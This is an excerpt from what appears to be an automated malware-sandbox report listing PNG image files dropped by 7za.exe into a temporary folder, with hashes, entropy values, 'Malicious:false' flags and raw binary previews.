...SN....Z$@...pM..R.U<@.,wc.'.w5.2.D
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 80 x 80, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):2751
      Entropy (8bit):7.870859566545871
      Encrypted:false
      SSDEEP:
      MD5:3F7796ED08FFA94C03A7A0C763C68152
      SHA1:AEBE08C3F61EA1244879AEF2DD51D018F3DB9CC9
      SHA-256:C4829356C0AECE6AD343A0C6BED9DDC4BF7029DE205D103E8292F09E1194A017
      SHA-512:A945FBAF14A667798A08546D1AF6279194907A4181664C4B657F51427273B2CA9963234C994F6EB9924182FCCD1A9D2A0CB43144A6BAFB0555BBE7FCCA02C8F4
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...P...P............sRGB........8eXIfMM.*.......i...........................P...........P.....(nu...5IDATx..[pU...WB...".......-.......A.J..:#)...Z.O.QB....E.>....E....D...j.m.#.^.T..v.rI.N..o.og...'....>0.o.d.......m}k......'O.........)....b\..eu+8..../8.yn.Qo..T.T.>u...$......,.A._@...#....%.....3....9-.zv...Na.....[I.......(.B.g..%......]r..Z=..C.k...R..,./..!.*Ej...f.Y5....0_....Z.e.A......|..Y.p.2...K.....P.W....%vn.`l..+f....;7.06T..3..q.....5S......Y/b..<...3..&.Q...E..1.j.g.M.....C_..'z#G.Tw..>n....:.tr}d.........y.}..@Q..v.ps...9...e...\...0.?v..=b.|F........j.N....}a.._Lo0..6...j..:.m..2...0g......{.t...9e..}"....0/....\8r.&i+...6K.O.@....f...........i..y.\.f[.?..?.y.n..4(....{.l.1...4..r.ND..\.=.#W\..Y..)q.......n...u..j.......i...N..4@L.V.U....|Q"...*..O...%A.?.kV..M...p..^u...\....'...=s.k.}j.?..z.......K.f.p.4.....0v...e.....6...?p...{_...~r.=...U.Q.9..u.fq..pq......o..M...8....>.t.G.8K'..8...t..Y.@..g....*d..w...
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 62 x 62, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):3106
      Entropy (8bit):7.931410773787747
      Encrypted:false
      SSDEEP:
      MD5:59CC1851DDB08A108F29CB2E1BBE7989
      SHA1:7EEB6DD16677B1E64A2ECDED24EE05F00F72595B
      SHA-256:23E8FB261B1E33CAFF6A3FC9D6134B38F960CEA5362F59A3A68DFEC4B9AA0A07
      SHA-512:FAAF54C75DFCD8081742850AFBA1DCF713492129AF524A6519CE3F5D589748240112DD63CFCB7DC3EE779991DBF4971F1D97CC022ABCE4DC24D95ADE4F44E702
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...>...>.....s..D....sRGB.........IDATh..[.p......w.`w..D4.b..c.+. I@m;cU@..D."..:..v.j.j.".:.#...a........$$...V*.|T4 ..fw.....~...?...@..;....9......@.......~..]..?....L/ N...`B..m.............*../.8.1..2..y......C.VA.=A....=i.......+.?%/o....l....n.fD...Vx...>.{R +^..9.^..P.. .~....x.E.I..C..7..b....%...g%H.pb%....3Gl[L.}B..;......Y....?.j{.3O......'XU .O8....5.n...t.F[.Y.h..|..C;..z..........%..<5...s~.Ef... ..n,...g...{.........k.-..7.=.......I5..6...Q>.".5......p.%.$'...c..*.....!.X0jjp;..[76]Q.C;.....R....9m...Z.."3.^....5..R.$....L..Y.MV.e.R.F.q....S.e.....P..D...R......Y.~c....f.nI...,#..5.[0.%h3.t.aA.m.t.....U..~.DY$+n........#n.8...!.E..p...B...[.T...g..=....w.t.#z|E.w{..c.a....|./A...V..u.,...F..........9..A...-.rt..xM.-..-.u.o.U...>...i....[.h.G.-.w;~..........G7T.....s......}.......9h.....N.D...._w..j..]..k.*..s_............J.Wx.7...Mm$.-u;.9.n..\..r%@..kA....0~...N..G....8........c......t....
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 60 x 60, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):805
      Entropy (8bit):7.6467619141792085
      Encrypted:false
      SSDEEP:
      MD5:2BA18A2B586A659F915807A2285BA133
      SHA1:145C876733397DB67DC9FB38B19008FA5939346A
      SHA-256:C29A4BFC5E85016FA76408D7DE5C0FCCDF48B11D16FF6A2382165C3F3C1490E1
      SHA-512:580B4F134BAADAC009692BEA73730789D2CDAF56C89E074E5874910237F2ABC7C1D4E713E43B838D7F2651328F0A848120325E10FB1CC4975A43E29F352891FC
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...<...<.....:..r....sRGB.........IDATh..[;o.A...3...K.H4..Q.D.C....B(V....BD....@....H4 Q.n..I..!$?R.n.=...3..m.^t...7..|..H....P.... ....Z..7F`".^...I................*\.S...1/...../+...^..(...m..i..[....T)jN.#.w....dtG.C.GC..F..]&...{D;{..s6tLp....cA.Wz....Dd}..-g.A...$....X.CQ......K.lv..(.<a...~.=.1..U_.-."N.LZ...-..3<.....A_..{.?e.w.J......tM.D....\.B..r.Fb.i..L;..2r...:..-..'...'..R-&....^.)...N7..Aa.......V.w|P.w............]!m|Aam.}...}WH._PX[A..Aa.......V.w|P.w.......P..........1..5>..q..c.z.*"-......GsH....?]...!q)...=.,.Y. !.b...5.....M.R.ntzW.)Q(.d..5...'...nX.~.....MA.*..3,g......T*..}|..w..4.-w....'C...@...^.&.w....1...w5Ak......R...O.Gj.~...../%..J=..gq....+...$.w.G.....W!..&.c.v....G.#.IA..+.{.nx...M.,........eU...5..........IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 62 x 62, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):1610
      Entropy (8bit):7.8592263576040775
      Encrypted:false
      SSDEEP:
      MD5:D22AEA4648BF78252544F599624E91C8
      SHA1:80117B0E5585CEDF23A6D9177546FE7767FFEA90
      SHA-256:3659ECEAE30689390AFD92B26E0CD4B03C0A976C6D3A13F6639AFA034CA8C63A
      SHA-512:028C837B97420D6FBB229E2F125E794D34AAE780978C0546B398FD92CAF24FB5E8F281D2EF96F0F14E75B963CA0356A140F07A49B2B8C9A4F8691D32F5B5FA71
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...>...>.....s..D....sRGB.........IDATh..Z}L.E.......(...k.R.h....Z.blL.I.G.h-.4i.&...?L........l..1J4.I.?..Jk..64X.VD+H..p.q.....-......m......y..7_..b'....l....=`{....<@M.@...}.R".l.S5........' .."~o......J....y..U.iY.G*,.T....$.f.e..v9...l9...aS..p.O..=.k.V[...NPJ.Z......!...M<].Y..u;...7.....c.wh.. &.-.......P.D..@..|=....2......=....I..:&}.K..a.P.R.....v..J.F...:.........F..[...FBh.2`...#..#....7........N.".{....:...#c^...7....m6:...S...q......Z(r..X.4bF......r..07$..D=...z..`..`-.Q.y.9.U..k.l"Tz.n.^@~r:..^..-Q....O.$.4.r%%<8...}..2..g.SX..7..;&....*8.....;wAy7|....&..J?L...5n........)".aaNI.0.E...w...@.......l.L......J..u...oZW.............p:...).....a..(n..m(.......e....#o...xnU%...[#..G...@..F`..Uhp2..<a#.....H...)c.y..(..+%....C?...b....X.yh>...e|..#.......(+'4F...OV....w..G..@.W...].Hx....E..f...S...b.v.}]{=.D...*..`O./...:....%.(2....N..x.t....V%.H....y.j..`..%c.7.Y.&.9`I...+....d.P7F.A..P..-...M.D.*..dm...$J>.yTn
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 60 x 60, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):1162
      Entropy (8bit):7.801471614879426
      Encrypted:false
      SSDEEP:
      MD5:E9CFB17D4235201EF69368492621A928
      SHA1:10D46B39F06D266BDDE0A15E7C33DCB3E48A0472
      SHA-256:659BB21310B29252EFC2307E2C4603BC6F924C2963EA67A11B68BA3135CEE229
      SHA-512:013BA140C8FA04F950A86198F7D2E5AEC86D01022035D97A8620F6B47AF372669498B116C34690EE0D7D0ABDAD23B84E6151DE3CE5804F75F52A439B22BE8EE3
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...<...<.....:..r....sRGB........DIDATh..[H.Q...9{.RS..z.."E..-f{....!..5)P.. ...h...[Oa.[..PO...n.BiH.......j....igw.[.....A............2&#..*.X.4..k..z.b5E..x..l.5nm.{..].......#......:..E.,..v...b.nc.7%....>lc1M.w..2Xu..\...$...op.G..,a31.b....R...yV)E..E.M...k.p|H...8.a8.Uz...r....c.L.Fu.Y....|.J....b.......7.....LV!.A.q-.M..%#...k8..Y..6..._AX!y.3..jx.k~v..C.m...X....V...p......'..F.. .S..JK.MaUb..t .....T:~j..7.).WZ...`...vJX./.......KnB]X,...l..[1XYq.......&dUW.....;..`.K1.)..]...'..JBp..[.u.......q0.SJl..._~.?...T.`...{......8a...Lwi.+.<.4.H...^[sL.......X..b.......0,'Kz.c..=9....dI.u..z.''v..,.aX....n...%=.a2..:M..H4.0.....qE.g.._...S.%A..h....r....G.o(...Z,......s..;.3..+.MC+..Z..Y..0...L..l*..f..Ni!`n.?.W.s...&.e..>.......8V......S.$4..AgZ..0..K...Q.....zZ.../....Rg........8.L..:.|9t......C...C.....s...a.....Qs..[....dz)t>]...w..K........)....m`...@X.....b5...i..(.......2.m...jW.va..l.|).6|m..p'..*e[.`..]t9.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 62 x 62, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):1804
      Entropy (8bit):7.878931306051953
      Encrypted:false
      SSDEEP:
      MD5:99C92FC71BBF996EED99E0CFEDA1D624
      SHA1:8FDDDD8CF31F97EF842BA8463F5824B3360D8DD3
      SHA-256:751EE74D3BE889FC181012BFEEB098162A4EB45F7F2B5C9C11EA2A4542F3547A
      SHA-512:5F571F04718FEBE9A3EF135B13A9B6ED53D37B0F9CCF0A487F4C762D87F39A2E4FF51D4416C4DEF2C0483109F33DDAB2CC8CA555C186331E52A31700827FE6AB
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...>...>.....s..D....sRGB.........IDATh..Z}lSU...v.[...%J...b jP.c.j4..."t#.....1$@.J...#..0jd.......&..B.,hH...QDB...d.ma.}...v.m..h.:;....w...{.}....+\...,P.@.....,0X-@N+..F.f.7q...k=..._..QI\]..'....V..}..!.~....,E.]U...3cO.x.....<b.N..>5.9f.8...t^....y....m.$Uu.3be..3.+. n.^.l...b|=.m..F.=.'..../......p.4.U....8.....|.T.n....+.f.og.8".=...~..)?!.N.......{...J*J....'*rm.]...n6_{K.p...p.dw.....w.......-mZ3......?Q...s.....8.{...cR.\.9.....x.8c_K...Q5D.{KbE.Vq,.G.;6..8.t<.I.p..........%hX.O`...a..H...^H...i3....t9N.s.\(.ln.)l...............zB....R..{..3.wv....?....z..X..j...m<.k...D.,...QAG.:.U.|)ysY...}..........G..u......#.]X....].O.6.=...%..{..E.<K!...,.S.#r..=...n..v....Z...-....1~I'.....&...[.b..*..W..MfSV........WO.2..0.{..}.d$ .....{F.z.L7.!..5..P*.p..x.l..|.?....L.....p..r..Z.....&$........%U..K..%.h......V.K.bF?...o..O`..6..........b.@>..4.p%.7`.....Q=..!...D...F..}.G9..U....{.bo2./"..e{.g..%..R.lZJ;G.<.R..v.v).&.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 61 x 60, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):1266
      Entropy (8bit):7.777341049331227
      Encrypted:false
      SSDEEP:
      MD5:A9036D7D42043D19AC093795A6222220
      SHA1:EF13621D2B2F42E807D87F246E41E022533FD71C
      SHA-256:B7B44DE32C4F017D4C875E0274C9E66E19B00236EF6CEC77E781F39FA289B424
      SHA-512:7B868D76F1C3122B7A81284DF3493851DFBFD4C3C49121DDE550B8CE3F3BF99BB3F959156F4B4405654250907B3C26FD22399D6EBE54026C18C81447C99F3049
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...=...<......>.L....tEXtSoftware.Adobe ImageReadyq.e<....IDATx..[.Q.0.V2..t...S....9.PAB...$T.s....$.`:p...f>3..d.X.....d.I....c.........,AOT..F.h.^..7S|\....b.IUx...P.9..?2..x..~Rb..8.:..9.?...t.8........v....L....p.w..........N.v....W.V.i.Z.U.I...;>.~0.0J;..+p...d......om....oj...l.U.-.....|#;.&r_.s...* ../.......s......!....b.;.xO......,..u'.Z.H...$...9....'\...e?^..1...5.`p. .O......?f....f....wpmT...;.2....`.ay7.......<..HV]..|.>..+....^.......~..pj.V..46.h&..`jDT9BSF6..I?....|.-..............?..6."k..]:r{..u..Ae.9.=LH..Bk...J5...qO.(...p...wn.....eW.#.fn..pA.....m.1)......G...l...F...wWd...4N(!9.+...}D..i..w(..,.Z...m....Xy.z.\V.".FLc..)..S....JQ./..........{..h8...6..#?~"..v...M.N........F.6.)..5j^..k.N".NH..kAB..uL.$Dljl!.'>._5.<..|......cX.....=.M.@.......Tc`5..kR?0]..m[....Q...d.e....E..]...gH}^H.].......r.TL..b..%..olb.I[.........S`r.[......l.....\~q.[ih!.....$......B.e.n.J....+.r...r...)../j...?....U0"..{...Z...c
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 60 x 60, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):1418
      Entropy (8bit):7.8469927012080225
      Encrypted:false
      SSDEEP:
      MD5:F90EF07F096FD0FDE17830B4AD2B2C5A
      SHA1:E6052F6141B79ED0054D7DBD6C2EB3631E0FDFB2
      SHA-256:03896986EC17A787441319499797E5051DB1706BBAC04B4771E073DF8308389F
      SHA-512:5B59C733D6F0A571052692ECAE5264CCF117F8F4583701059BC9DD3DC98CB0E645CC000D45E71452816BD8E44030900D9B5FBD91B7537BF3FFBAA0F537FB81C1
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...<...<.....:..r....sRGB........DIDATh..ZklTE..s...n}.6R" .]..b.*.k..(...p.k..1i .........c......-....11..m..R..!$...\v.t.{.g.....w.....I{.9w.|g.....y.......<.x.p....%...,.)...X3../.....v..F...o<S......^l...=...X...Cv8f.vOD...l...n0z...K`.b...e..|.q.x..S..y...............";Ee.:.{.....d..a."....n-...2N}....]....L.p.hD...sc98......m......5....g.U...<..BF^z.Z.r..;...b...........J....J..1a......f..E%K..W.3.f....6......h][3......Q.n.....;n8]XSN..#....%..}....j~.......ur....(`Pj4.[`u.....o.y.`..S..q.....j...l....`..`..[.:2xi....S......F...G.K.........{..(.Ms[z.K...H.F".C.. eq;...i...\:..p..k.1=.F3.m.I......=.}.>.nx&..N.........L.qP....(F......n....!.......V.+E]..c0.....y....h..._..r...e1C;.GW..... .(..".=#......t^....y.i.i.z...........}q.....K..imK:..@4...&...R..C......G..eD..y....C1~1..@.._0........T.`:"..0..W.g....Ne....J...`S.$.,J............).....T\..#!ysU...0.6...E....qt.].0.|..Q....Y.UCU...E...3......Z....8..p....7...(3.{...
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 62 x 62, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):3833
      Entropy (8bit):7.941137100900779
      Encrypted:false
      SSDEEP:
      MD5:4FF8285E1373AF3804F4F6F612CAEC16
      SHA1:61D78AC05F4AC2EA7C004015677136DDBBAA6B33
      SHA-256:6F41068F5D7AB45CF6E5E033C95B8CDCB0409CC770D496BDD78C6926893BB1F0
      SHA-512:78C3AA0AA93B1EB480FBAD2D46483AB91876ED2BFB1431E6DCBE4FFD04BAFC6E49E49F014CF5B6D77B2848F68CBCE62801CE99F5F122199CE5A2385BF37F53FE
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...>...>.....s..D....sRGB.........IDATh..[yp.E......a&' .<XA9t.@@ .,.E..r.l.P\..B-..]V]...".....Z.&.UT<V.b&!(.E-."..G@4.\.....zf........v.y..{......!?......Y]ZV.~.c..(e..(.BX....@....-...:.}:._P.9.D.s...B.d480.b....h...V.._oZX....u.D.)...&..FX..({v_;.>?c..r.<..gZ.=...YQ.YU|........L.....WN..!.0....P...0...X.W.Z../eKqZjs.N...t.....=.......i_..k.4_...r..N.q..H...(..E(...4J..+.r>.0....{.e.........lD....B....X.....v.%.i'.3.!4W..AX...&3.d.?.+.+e|&.~)..}2.9[)..."@.C4.{{.y...k.js..W...Q2..y.:.l...(|..>+^^.B..e.....>...kX`yG....C-.....k!..`8....{..!m.....Sj.cL.....}.....2.=...J3..:.H..0.#....i..=..E'z.....<Rp.>.UdR..d.1.....9.X+..\...[.L..v.UL..9y.PN..)^]oPT..h`.hT#..J...z._..5.;.c.E.X.n...+.s.9...!.......\.Gt}...R..=vi._.8e.....P..../*...v.......a.3D.L..W.*.`.O...e4....b...2.&..(..3.TU6.1:...vS/e.....(y.c..........\7*Ty,...b.4.K.M...S0...y...v.K..3..$...U.A!.....n0.j..i ..0./....&<.A..`...e.S..6.zG.o.....}...Q.s....e6.U...0.(s.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 62 x 62, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):1891
      Entropy (8bit):7.8670006008393285
      Encrypted:false
      SSDEEP:
      MD5:78F8FA9F8B9ED9C25FD07A99B4AA7C31
      SHA1:2BBE289F6FF73D92D261492BF066856ABB84B870
      SHA-256:980A27B7465D84A29BC9D9F3F3B53E62BDFDC5A79BB99089E756339D0DBA0722
      SHA-512:A56B6F0E764A8CC12AC6F609372B7E6AEC069291E10663EA19B16657A80D0712482C32647183E717B0710A1F66E2B45D30398A811F3087D99BEDB6DD1A5D7F8E
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...>...>.....s..D....sRGB.........IDATh..Z}l.E...k......Z..i... ... 1......(.....F....0."1...... =$A#.....^.P.HB(....H...-mw...u..........y.......fg.I^I.$=...C...oL.}.,bb...P6.Pb'...(9...f..-J.-F.u..S]....R[s<m.=p.S*./..r^..-.......\A..8.......V.+#.....nf.R.[P.6.>.LqX..3Nv...='We...o..O..2.......d.......^..m.%.YQxs..5+)...Q..P.$.......x.....t.8.&......rn....=.B4....-...F....... ..W.=tb....m....o}J.LK...6..W9a....C.7./".S..S.yO.F)-T..I.a..a.V-..S.1(i....p..._.....u....q:...J="..J...L...p.7.lM.2[....Jae..D......x........}...*......`..c..f...:..x....@_[.T.....)....jm...a.,=(._...9_]ICKD#VH....9..3*..l..%b.B%>...X... ..!q.{yfC`..m.+.......cU^...P&.R..S..r....O....1..q...n.-.}..O0......y.-.*.8.Q. .b..q.7.y.w.W.p...m.0...%.2.f....d....|.P{..p{gO...[..Eso.iE#........O..;.z:\...BW...B...4K...,.L3oDU..1.b...].....!5-..X\.Z..._..g3*...Y7PI*.}*2.....|.s.].......s.v.w|..=y%=...b...b...f...L..`..l..Ef.<#.......D2......bW.z-B.....GTz..........5..
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):401
      Entropy (8bit):7.02418425779771
      Encrypted:false
      SSDEEP:
      MD5:EF7045DABC378A2DE92E329B71558D6F
      SHA1:0934AC53DA10B3643E916508B457E8DF0BB71596
      SHA-256:B9D2569F8235A4D6362E5B35BFA8271951C2C4CA055638C17814EEA08D953103
      SHA-512:604431E5F99E8B928984352B00E52D572C256296589500896FE72F0DE6031D608D055796FBDF63D31E09188F6320FA6C076047DCEEADA24D1A0060C872DEBDE6
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR... ... .....szz.....sRGB.........gAMA......a.....pHYs..........o.d....tEXtSoftware.paint.net 4.0.3..P....IDATXG...0.D.}I..2`'..@.@....o.s.i|sI-......p,,,,,..y..4..}/EQ<=k.uR...WU%.}....".s..@.(.4M%.CI.D<.8..=..y6#.I!.|....+Y..{...hF.6C..d...F...Z.)d..S.......!.P'..q....P..K...*@...h..Q......0.X.a0....j........}'ez...1..nF.q..m.3!?.-2.i...3.,,,,,~.....W."e.......IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 37 x 23, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):333
      Entropy (8bit):7.025800399886957
      Encrypted:false
      SSDEEP:
      MD5:CD0F456B5FAC0253578898C1F2DD2806
      SHA1:651C9B6AEF2E0EBEA22DDFA87674A4C6A7FAEC98
      SHA-256:80E34995F3F58FCD299879C025C9E95C44CBD93CC8A5C40D5350E33D6B6A6658
      SHA-512:BAF2692AED9247B490F6F078D2A40464AC9FFE358AA841002662275BB0BA33AE98457692F218E9AFD67A033F8ED850C7FB923E699D4845B4C80F62B7F037A798
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...%..........,......pHYs...%...%.IR$.....IDATH...m.0.D...... ...'.3......A.......A.%.0....`.1.Y<.}.....W...@#._.&.6...\1P....8,..R.7....."..._t.....S.N.8v...`=.1.V.O{....+.Q...;.%.7;..l.....{.........@..y.)Co......;:U.M5.7U.p.n...*....([yN..c.,P3@..J.r...C.u...().d...3.....JU...[....=...4.p.....IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 30 x 26, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):376
      Entropy (8bit):7.173438234482624
      Encrypted:false
      SSDEEP:
      MD5:B8A359C6F149F8EA3BCA21AC8E7CA325
      SHA1:7E368E2CCCB7442806F56ADC195448B325C380E1
      SHA-256:D910167B4A9EB25740AFFF7614B83939DE867DB50F59A6B2D418FEF9E2FDC40B
      SHA-512:FDD1779A97A6BF31C01BF157AD068F136128B43F1EB4876B7AC22B42B4807CD0F8DD3B4E057C3FD79680884496FF42495068A84809A58B0263418D5033F879A9
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR....................sRGB........2IDATH..1N.0..kc..E..`H.9.CQ....,\...D.$..H.z.$..+....!...7.d.,w.....g......j.u.9.G.#k.......y...N..c.|..o..H.8...pfF^Jq.-..k.X.ei.i..j./}..N.8@...}2?d\[k.M.\S[c.s...f.";....../D6....k7I...}K....P.(....4]2.............._.V...rz...V.s .\....G.....5..w.1.v..g=...~a...+_...y.\gY.......i.C.h....J?...,r... ....IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 26 x 30, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):979
      Entropy (8bit):7.737748465288316
      Encrypted:false
      SSDEEP:
      MD5:D76E522DB14EAAE130F795F308A7D201
      SHA1:B4BC5D216050A468BC907DE9D29F19600674D170
      SHA-256:AF15C32FE45B16DAB0ED27248901F0111F0CA615A12C472CDF03327F2A4FCD5C
      SHA-512:D8315F20DB85813D7164E832C947A7AC2B897743204B98CCA9B84DA1B6A8069724F843FCA6C40C5B1F47BE463A58A78AAE402CA42DA681473B55B807E19DA3A6
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR.............2.......sRGB.........IDATH..Mh.A.....j.H5U.TD.h.P.`J...PT.E.K..7K).o.EZ..zP.zP..T=.mC.T..'.~U*.MT.D.........nV../.....{3;3QJ\.............Y.(.>..........{M.)N#CCC.u#-N......uA.....Dd....t.;........?e... ....v/Uv...gu..%Dccce.t......B..D".K&.m.\...2... |T^^~...&.cU.J .G7 ....MOO....{..Up.E"..L....=.Q.,...(....`_.xJ...&........U..F.............-I>.vb.4....L....>.6H......Hl.....n.d2S,.i.nR.;.+........'_....X?.h.m.f.....~..F*.j.#yN.#| /L...,=d<.o.._`2w....h8..%.V.T....h0..$......3..C%H..........}| /m....7......T..)..j.f....>7.pHE...6..V....T*2..k......}n.8.r`..IV.P...W......e....3...d.RQ.y.6....C^.".p]:@.Dn.Y5/{ ..gaEd.5./F.q.$...C{..... xYjI...Q4..9h<|z......Wp..Y. .R..A}....\...d.....D".8..q.!..A.......;.Z%.]....?.|h.......^.Dye.d...jD...li+'&&|.f./UKbK.q.H.".n.A....+:'...X.r...w;.. 7..|.#.}.c0..T....."..c..m...\.1.#.d....nr.%.7...:..~..._S.....W..#.l...mgi.3X.....{......_.v.^..{....IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 28 x 26, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):513
      Entropy (8bit):7.370351022181885
      Encrypted:false
      SSDEEP:
      MD5:D5DF1898DAD9B21FEB908086A4E4596C
      SHA1:56DC357ABB0A13ACE259FA8D174810FE94A2FCB4
      SHA-256:0F9D4DDD167ACA5B6B5D990D6795A6D0E566F52FC155D01BC2199218BC3C2FA9
      SHA-512:A38C8D55B2E80C62A85C8981B2BCF8E3C6579F8463D9F97316EEA3E666C4EC27588D72A08BDF0503047396431867B557FBF4BBC4F2A0390D9D75CA30CF2AA09B
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR..............T<.....pHYs...%...%.IR$.....IDATH...Q.@..?.|..`O.a#...g`...!...`2...@.I7..L...C...c./vM.......k...{...<..o4.l.|.;ol2).76.V..P.oR{~Bo.%..M\.....f..H..r'.......zc....qU.....V..v.Cui.\......K`.d*c.3...-....uA...(.yKQ.....)p..&...x....pB.+U.......l.B.2.j.......P.Z...,.fu.Le.Q.7d..b.z.j /.7f......+&..d.G.I.0..k.l.-...PLV.9;..X1.P..9....(..E....:..IW....I.P....0/;..,{4.SL..l...}..-$..8....+...vxcsE.W..l."k.E2........xV.L.O ..u.2x=1a.W....U...b.....IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 65 x 58, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):1058
      Entropy (8bit):7.660833183165185
      Encrypted:false
      SSDEEP:
      MD5:CEC6C251B04207D837C995F491AC8E8F
      SHA1:CF061687222137FDED33239CFDC7EA7A83CAF200
      SHA-256:86EBA4D90940BA00379BB063BBA524F1FE129426A1EE23C587B5E988357FECF5
      SHA-512:6BBDE781F744DBC10CDA087BF26C4A224949F4A80F7AA77C78762041B3CC044053C68117F96274AF4D8EFB47AB2405073B4A168BFE9A1F5A905E48D8F56DBA98
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...A...:.......4G....pHYs...%...%.IR$.....IDATh...q.@.E...7..d..X.L.......<......`...g.3.......P........@...;.-..0Th.....2)e6.y..!..:...X.....R...E ...<..`...Y.%.P..5.O_..1[......f.{.Z.>Oj.5.p...R..Pk...%..s$A......x...g%...d.Jx.R..!..Q.....~2..*h./.e."h.#..,9....b..Q.........|.....?.:....+)0h8..=..L.5.gf.V[b)e......IH.v8nA.%VZk5)...Gs....A.i.$cW.)<Pp.R&.r..B8. ..).~4.!....O......b.x.z...8.p*.l.$(f.Q.`.....i.e*f..(E K.erMsdk,.'..tVW.IB.,1q@..2[X.[...s.ASK...=....H0). |]m.?..2E..(.[f.!DW.,3.T.JN.E.UYbOB..-.+...-3_-1.s6]-St.`....C.^.e&],St..Z........W..Zf.oK...|+.e......)....Zq.%.^,..2y].8..d.t.A..S..D.....0-r.tz%.P..X.y......U.MH.-3.q..L..d..1$...2.[q;.V......i.H.e&}...HQ.......h.|z.v..`...g} ......}.g...*.J..").k..n...J.Xb.)...i.."!e..Jtx7.YWTZ.(91^.D....d..J...Zq.Jt.2...C.......P.$(4...e,...W..U.@.N.)...d....D.-..H\...o.+aP..... q.T...i82....%.xi....VFL.uo\ox%.`..0.(.^]o$..S...).B(.L...O.....En..`I)..%Z...e...3n#..\.G_Zg...b.4.,.f
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 264 x 263, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):4124
      Entropy (8bit):7.79007760385625
      Encrypted:false
      SSDEEP:
      MD5:0E654341C797A9DD59D7F0C1D198C6C6
      SHA1:998DFF7B50C3C2B015F9D7FD47B0EBB3D056E0D4
      SHA-256:FCBEF9BD27585D997224CA79F7A3F94856D48ABE99DFC591E42B1347662E7B05
      SHA-512:5D2257EB5D8FD68E89726919FBA5A9B34D142E733FA0AF6358CCC158FF36F1A4F8808F943255DDE0B35D55E8F925CB13E09ECF473F1FE7BBCB51ADD46B3C6078
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR.............R..*....pHYs...%...%.IR$.....IDATx...k\.......D.TR08..d.q...].&N......&)...Y.4t.1.].#7...i..#......fQ:Z.P.A.....]...Z..;....<0$q$[s...=.{..g.bqX.\.T1..n^....E.J:6..7/I.V}../.......}.k............H$.I.....j....A...b..m.[90..k.G... |yP3...2.#..I........P.A..5..,...p..P7.mFdf...G..A.Y..I.#.5Fd!..,.U..2....I.....E.d. l.)4.k..I....I..,.D..P3R..hd..E..@.yH.uI;...,Av4ln.*.D&.....F$..$.L..3.."i1.PFX]~. ...D..)....(....C[lfB...(%..C. ..a.....$.5.x...xI.;...X.p..I.-..A...m...^.'....+g.a..-.2...5.p..(9*..... ...eI}3gH...C...-a..$5\Z.p&A.&.7..".-..R.(|.`...&H....... .4Q'A.'.U..hBB..v..p.0..=....gJ.B..Y..... ..-I.3.I.9,)Z..*..7..W.....a.....B.8.T../au.a..}..9d..Q..MX+.S.u..._.4.K..D.rhJ.....V$..yi. ..mI.g.e.2....&...+.`3.U.&MX!.V*.I .........\/..Z....NOR-..m..9....g."...`.$r'....J.A ....0...b.m...s9o.. ..p.. ..I"..8,or.....h....|....[.....R..L.D..0'...<...@.T..s.. .A..q.6.,I.g..2..D.Xz..0..e..*.&.X....-..e.. ..<.. ...x&h.=......Y.M...a...
